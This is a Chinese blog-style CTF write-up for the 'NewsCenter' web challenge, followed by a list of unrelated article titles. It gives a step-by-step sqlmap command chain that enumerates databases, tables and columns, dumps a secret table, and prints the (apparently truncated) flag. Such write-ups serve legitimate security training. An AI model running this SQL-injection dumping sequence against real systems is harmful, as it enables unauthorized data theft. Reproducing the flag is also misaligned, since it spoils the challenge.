当前位置: 首页 > news >正文

攻防世界-WEB-NewsCenter

news 2025/8/23 6:34:49

打开环境

有查询,猜测是sql注入

保存请求头到文件中

准备利用sqlmap

查找数据库

python sqlmap.py -r ./123.txt --dbs

查找表

python sqlmap.py -r ./123.txt --tables -D news

查找字段

python sqlmap.py -r ./123.txt --column -D news -T secret_table

显示字段信息

python sqlmap.py -r ./123.txt --dump -D news -T secret_table -C fl4g

得到flag

QCTF{sq1_inJec7ion_ezzz

http://www.lryc.cn/news/157829.html

相关文章:

  • vue router 路由跳转获取不到参数
  • 将 Llama2 中文模型接入 FastGPT,再将 FastGPT 接入任意 GPT 套壳应用,真刺激!
  • Ubuntu之apt-get系列--apt-get安装软件的方法/教程
  • redux的理解
  • 【Java】Java 多线程的应用场景
  • Mysql--技术文档--索引-《索引为什么查找数据快?》-超底层详细说明索引
  • jmeter 接口快速创建
  • docker 笔记10:Docker轻量级可视化工具Portainer
  • 028:vue上传解析excel文件,列表中输出内容
  • 在VR全景中嵌入3D模型有哪些优势?
  • c高级day2 linux指令的补充和shell脚本
  • Rabbitmq 常见问题处理
  • 人工智能和大数据:跨境电商如何实现定制化营销?
  • 博物馆网上展厅有哪些用途,如何搭建数字时代的文化宝库
  • shiro反序列化漏洞
  • 无需公网IP,实现外网远程访问管家婆ERP进销存系统的方法
  • C#,《小白学程序》第十三课:阶乘(Factorial)的计算方法与代码
  • 以antd为例 React+Typescript 引入第三方UI库
  • matlab如何遍历文件夹及子文件夹下的所有文件
  • Win11怎么显示隐藏文件
  • Golang专题精进
  • 手游联运平台都具备哪些功能?
  • 98. 验证二叉搜索树
  • Stream API
  • 手写Spring:第3章-实现Bean的定义、注册、获取
  • 这些国外客户真直接
  • 使用Apache Doris自动同步整个 MySQL/Oracle 数据库进行数据分析
  • 【1++的数据结构】之哈希(一)
  • 【网络编程】深入了解UDP协议:快速数据传输的利器
  • WordPress(5)在主题中添加文章字数和预计阅读时间